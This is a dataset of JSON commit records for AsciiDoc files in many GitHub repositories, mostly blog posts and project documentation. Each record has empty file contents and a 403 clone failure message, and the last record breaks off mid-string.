{"commit":"755d6b0d1fc3aee3d950e6c29b5fa8e18f6f8f5a","subject":"Create InstallCygwin.adoc","message":"Create InstallCygwin.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/InstallCygwin.adoc","new_file":"wiki\/InstallCygwin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14fbd053283d6793bab75afb47df653b4925eafa","subject":"Update 2018-02-14-dialog-element-Modals-for-the-future.adoc","message":"Update 2018-02-14-dialog-element-Modals-for-the-future.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-02-14-dialog-element-Modals-for-the-future.adoc","new_file":"_posts\/2018-02-14-dialog-element-Modals-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e3a55b81773007440d3bd7e5c4f44dabc8fdb18","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42e141eeab1ed8b13940440438db800e7ccdfd09","subject":"Update 2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","message":"Update 2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","new_file":"_posts\/2016-02-04-Reformer-lorthographe-est-ce-necessaire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"793228cb5c31751a59a27ce7fc7eee33d45ea4d6","subject":"Update 2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","message":"Update 2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","new_file":"_posts\/2016-03-03-Meine-Erlebnisse-bei-der-der-Mittwochskommentarrunde.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0509b41865f156c8ab2bf64efa2d4941950e6ea8","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3efff95e59b9fb45df70e4ae76944f15c5d0c4d3","subject":"Update 2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","message":"Update 2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","new_file":"_posts\/2016-06-28-Adding-static-pages-to-a-hubpress-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fa07f1e3f310cf4f04e6896ccd8750285d33914","subject":"create post The DIY Jacket Upgrade, Thank Me Later","message":"create post The DIY Jacket Upgrade, Thank Me 
Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-DIY-Jacket-Upgrade,-Thank-Me-Later.adoc","new_file":"_posts\/2018-02-26-The-DIY-Jacket-Upgrade,-Thank-Me-Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cdea9d001a8da441054785a342728227656a208","subject":"review pass, cleanup of work history section","message":"review pass, cleanup of work history section\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"workhist.adoc","new_file":"workhist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62e6e23c2e1eb46d8a3f98d122498757e76c56ae","subject":"y2b create post Henge Docks Air Dock Hands On CES 2012","message":"y2b create post Henge Docks Air Dock Hands On CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Henge-Docks-Air-Dock-Hands-On-CES-2012.adoc","new_file":"_posts\/2012-01-12-Henge-Docks-Air-Dock-Hands-On-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e5a58c31efbb4cc83c65517a1cf335d12154b94","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3717e98a603e6106c7c80519064ecdf24ff1a1fe","subject":"y2b create post PlayStation VR + Xbox One = Will It Work?","message":"y2b create post PlayStation VR + Xbox One = Will It Work?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-23-PlayStation-VR--Xbox-One--Will-It-Work.adoc","new_file":"_posts\/2016-10-23-PlayStation-VR--Xbox-One--Will-It-Work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cff0764226a0a9eca1e872db0069064324318133","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c124fd01fe95466474640a3adb509d781e084aa9","subject":"Update 2011-05-05-Audit-automatique-avec-Play-Framework.adoc","message":"Update 2011-05-05-Audit-automatique-avec-Play-Framework.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-05-05-Audit-automatique-avec-Play-Framework.adoc","new_file":"_posts\/2011-05-05-Audit-automatique-avec-Play-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72378aca17f704f917b2925a0d1a7d711627d70c","subject":"kata-spring-restdocs","message":"kata-spring-restdocs\n","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"guides\/src\/kata-spring-restdocs\/spring-restdoc-intro.adoc","new_file":"guides\/src\/kata-spring-restdocs\/spring-restdoc-intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f97d288954ad94861386d5c32ab410487ac89ad5","subject":"Update 2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","message":"Update 2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","new_file":"_posts\/2016-07-26-Episode-66-No-Good-Gottliebs-Premier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4936cb503c8a3547df0b03fbe6c2be0f36267c75","subject":"Removing trailing whitespaces","message":"Removing trailing whitespaces","repos":"destijl\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts,destijl\/artifacts,keithtyler\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,pidydx\/artifacts,vonnopsled\/artifacts,keithtyler\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c01d1e249b0a0893e31550c9be8d0074f38516a","subject":"Added Camel 2.18.5 release notes to docs","message":"Added Camel 2.18.5 release notes to 
docs\n","repos":"cunningt\/camel,DariusX\/camel,kevinearls\/camel,tdiesler\/camel,jamesnetherton\/camel,jamesnetherton\/camel,gnodet\/camel,christophd\/camel,onders86\/camel,nicolaferraro\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,sverkera\/camel,anoordover\/camel,Fabryprog\/camel,tdiesler\/camel,alvinkwekel\/camel,sverkera\/camel,pax95\/camel,davidkarlsen\/camel,objectiser\/camel,adessaigne\/camel,christophd\/camel,Fabryprog\/camel,davidkarlsen\/camel,tadayosi\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,mcollovati\/camel,gnodet\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,objectiser\/camel,anoordover\/camel,CodeSmell\/camel,Fabryprog\/camel,ullgren\/camel,sverkera\/camel,nikhilvibhav\/camel,CodeSmell\/camel,objectiser\/camel,adessaigne\/camel,onders86\/camel,zregvart\/camel,anoordover\/camel,mcollovati\/camel,cunningt\/camel,jamesnetherton\/camel,Fabryprog\/camel,christophd\/camel,anoordover\/camel,tdiesler\/camel,kevinearls\/camel,apache\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,objectiser\/camel,sverkera\/camel,kevinearls\/camel,ullgren\/camel,apache\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,christophd\/camel,christophd\/camel,anoordover\/camel,adessaigne\/camel,ullgren\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,gnodet\/camel,kevinearls\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,nicolaferraro\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,anoordover\/camel,zregvart\/camel,sverkera\/camel,jamesnetherton\/camel,tadayosi\/camel,CodeSmell\/camel,kevinearls\/camel,cunningt\/camel,mcollovati\/camel,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,pax95\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,zregvart\/camel,nikhilvibhav\/camel,onders86\/camel,onders86\/camel,tdiesler\/camel,davidkarlsen\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,kevinearls\/camel,onders86\/camel,davidkarlsen\/camel,pmoerenhout\/camel,DariusX\/camel,onders86\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/en\/release-notes\/camel-2185-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2185-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"235abc30f4408805c1e2ce6e32bd646dc048dbc7","subject":"Add Sednit README","message":"Add Sednit README\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"sednit\/README.adoc","new_file":"sednit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"61724bcf68462cf505b9e07c52f80114b367fe77","subject":"Update 2016-06-10-Testing-A-N-N-libraries.adoc","message":"Update 
2016-06-10-Testing-A-N-N-libraries.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-10-Testing-A-N-N-libraries.adoc","new_file":"_posts\/2016-06-10-Testing-A-N-N-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d18aa5f8dc0310915ed5e73460c1fc8dc386ee","subject":"Update 2017-08-24-Mein-erster-Blogeintrag.adoc","message":"Update 2017-08-24-Mein-erster-Blogeintrag.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2017-08-24-Mein-erster-Blogeintrag.adoc","new_file":"_posts\/2017-08-24-Mein-erster-Blogeintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77e9bf1b0feb61d538512545eb02b9cf92647b4","subject":"Fixes on doc","message":"Fixes on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpsend.adoc","new_file":"doc\/api\/xatmi\/tpsend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"83cc2ec79bfe61bdbc83f82aa2a43f3d08c824bb","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"71ba977dad7cc6a6875fa5cc3bae3ecec923f62c","subject":"Fix package name in manual code","message":"Fix package name in manual 
code\n","repos":"pwheel\/spring-security,MatthiasWinzeler\/spring-security,djechelon\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,hippostar\/spring-security,zgscwjm\/spring-security,pkdevbox\/spring-security,adairtaosy\/spring-security,tekul\/spring-security,chinazhaoht\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,jgrandja\/spring-security,driftman\/spring-security,spring-projects\/spring-security,zgscwjm\/spring-security,Peter32\/spring-security,likaiwalkman\/spring-security,Xcorpio\/spring-security,adairtaosy\/spring-security,chinazhaoht\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,raindev\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,raindev\/spring-security,follow99\/spring-security,djechelon\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,Krasnyanskiy\/spring-security,Krasnyanskiy\/spring-security,panchenko\/spring-security,fhanik\/spring-security,liuguohua\/spring-security,ractive\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,liuguohua\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,Peter32\/spring-security,MatthiasWinzeler\/spring-security,olezhuravlev\/spring-security,tekul\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,ollie314\/spring-security,jmnarloch\/spring-security,yinhe402\/spring-security,izeye\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,tekul\/spring-security,djechelon\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,kazuki43zoo\/spring-security,follow99\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,wkorando\/spring-security,mparaz\/spring-security,mrkingybc\/spring-security,yinhe402\/spring-security,raindev\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,vitorgv\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,spring-projects\/spring-security,vitorgv\/spring-security,panchenko\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,hippostar\/spring-security,mounb\/spring-security,thomasdarimont\/spring-security,jmnarloch\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,zshift\/spring-security,pkdevbox\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,izeye\/spring-security,djechelon\/spring-security,driftman\/spring-security,xingguang2013\/spring-security,diegofernandes\/spring-security,zshift\/spring-security,panchenko\/spring-security,pkdevbox\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,tekul\/spring-security,jgrandja\/spring-security,liuguohua\/spring-security,yinhe402\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,xingguang2013\/spring-security,chinazhaoht\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,adairtao
sy\/spring-security,Peter32\/spring-security,chinazhaoht\/spring-security,zshift\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,likaiwalkman\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,driftman\/spring-security,eddumelendez\/spring-security,mrkingybc\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,Peter32\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,follow99\/spring-security,wkorando\/spring-security,Xcorpio\/spring-security,fhanik\/spring-security,mounb\/spring-security,mounb\/spring-security,ajdinhedzic\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,raindev\/spring-security,follow99\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,mparaz\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,liuguohua\/spring-security,olezhuravlev\/spring-security,zgscwjm\/spring-security,cyratech\/spring-security,pwheel\/spring-security,izeye\/spring-security,pwheel\/spring-security,ractive\/spring-security,caiwenshu\/spring-security,forestqqqq\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,mparaz\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,mdeinum\/spring-security,mrkingybc\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,Krasnyanskiy\/spring-security,jgrandja\/spring-security,izeye\/spring-security,xingguang2013\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d71c5f4de96535dccdfc996faddac47258542c1","subject":"Asciidoc link","message":"Asciidoc link\n","repos":"funcool\/cats,yurrriq\/cats,alesguzik\/cats,tcsavage\/cats,OlegTheCat\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"77fe0314e0abef1ee4faa490496644ee456476e1","subject":"add vendoring code","message":"add vendoring code\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/B-vendoring-code\/README.adoc","new_file":"07-package-management\/B-vendoring-code\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab1b8b0b4e0238f9e454e90e8acbeb3a6dbf90b1","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 
2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6baaa91832834182ca1c1b836c81049dd5bf0ff0","subject":"y2b create post It Can Hyper Chill Warm Drinks Instantly","message":"y2b create post It Can Hyper Chill Warm Drinks Instantly","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-10-It-Can-Hyper-Chill-Warm-Drinks-Instantly.adoc","new_file":"_posts\/2017-08-10-It-Can-Hyper-Chill-Warm-Drinks-Instantly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fef3b14e40b4b92a43a8d61bab5e55ca4251ac3","subject":"Update 2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","message":"Update 2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","new_file":"_posts\/2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bcfed75e9b188bd6fb3930e680315b8fa94898","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73af89534a2236d4e108dac5cfbdf04c71fa986f","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8967de4f3bfa64b3a6f6898f65e6deb36adab5c","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 
2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62071563d41a08409d6ec6e0c7735c02557f5bd3","subject":"Starting to work on api docs","message":"Starting to work on api docs\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpsetunsol.adoc","new_file":"doc\/api\/xatmi\/tpsetunsol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b0cd543dca193c9f65d9fc3c476dad9a56be0563","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81aeb3bb6f4b7a0c0342616b1c7d18dda00015cf","subject":"Renamed '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc'","message":"Renamed '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to 